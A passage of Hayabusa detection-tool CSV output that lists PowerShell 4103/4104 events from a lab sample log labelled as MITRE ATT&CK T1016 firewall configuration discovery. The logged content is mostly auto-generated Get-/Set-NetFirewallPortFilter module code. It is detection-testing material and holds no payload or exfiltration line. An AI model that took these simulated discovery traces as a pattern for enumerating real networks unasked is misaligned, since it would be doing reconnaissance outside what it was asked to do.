$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallPortFilter ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.895 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetProtocolPortFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.911 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # 